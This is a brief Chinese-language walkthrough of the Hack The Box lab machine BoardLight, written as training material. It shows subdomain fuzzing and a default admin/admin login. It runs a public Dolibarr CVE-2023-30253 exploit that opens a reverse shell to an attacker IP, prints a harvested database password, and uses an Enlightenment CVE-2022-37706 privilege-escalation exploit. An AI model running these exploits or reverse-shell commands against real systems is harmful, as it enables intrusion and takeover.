BoardLight
https://app.hackthebox.com/machines/BoardLight
受害者ip:10.10.11.11
攻击者ip:10.10.16.6
参考:https://github.com/alvaroogs013/WriteUp-HTB-BoardLight
https://loghmariala.github.io/posts/BoardLight/
https://blog.csdn.net/m0_52742680/article/details/139233464
https://blog.csdn.net/tanbinn/article/details/139576519
端口扫描
目录扫描,也是没找到有用的信息
web页面发现Board.htb
加入到host文件中
子域名爆破
ffuf -u http://board.htb -t 200 -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host:FUZZ.board.htb" -fw 6243
加入host文件
Dolibarr 17.0.0
找到默认密码
admin/admin
登录成功
反弹shell
https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253
git clone https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253.git
python exploit.py http://crm.board.htb admin admin 10.10.16.4 1111
找到数据
/html/crm.board.htb/htdocs/conf/conf.php
dolibarrowner/serverfun2$2023!!
ssh连接
提权
上传linpeas.sh
linpess 找到enlightenment提权
https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit
获得root
原文始发于微信公众号(王之暴龙战神):BoardLight
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论